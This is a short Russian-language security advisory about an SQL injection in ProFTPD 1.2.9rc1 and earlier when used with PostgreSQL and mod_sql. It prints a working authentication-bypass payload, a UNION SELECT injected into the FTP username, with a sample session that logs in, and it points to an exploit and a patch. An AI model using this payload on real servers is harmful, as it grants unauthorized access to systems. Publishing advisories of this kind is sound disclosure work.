Дата публикации: | 25.06.2003 |
Всего просмотров: | 2501 |
Опасность: | |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Описание: | SQL инъекция обнаружена в ProFTPD
при использовании Postgresql и mod_sql. Удаленный пользователь может войти в систему без авторизации.
Сообщается, что mod_sql_postgres не фильтрует данные, представленные пользователем. Удаленный пользователь может внедрить SQL код в переменную user login, чтобы получить доступ к системе без авторизации. Пример: runlevel@runlevel:~/$ ftp localhost Connected to localhost. 220 ProFTPD 1.2.8 Server (Debian) [*****] Name (localhost:runlevel): ')UNION SELECT 'u','p',1001,1001,'/tmp','/bin/bash' WHERE(''=' 331 Password required for ')UNION. Password: 230 User ')UNION SELECT 'u','p',1001,1001,'/tmp' ,'/bin/bash' WHERE(''=' logged in. Remote system type is UNIX. Using binary mode to transfer files. ftp>Автоматизированный эксплоит прилагается. Уязвимость обнаружена в ProFTPD 1.2.9rc1 и более ранние версии Патч contrib/mod_sql_postgres можно скачать отсюда (или посмотреть в источнике сообщения): http://www.proftpd.org/cvs.html
|
Ссылки: |
Эксплоит SQL Inject in ProFTPD login against Postgresql using mod_sql |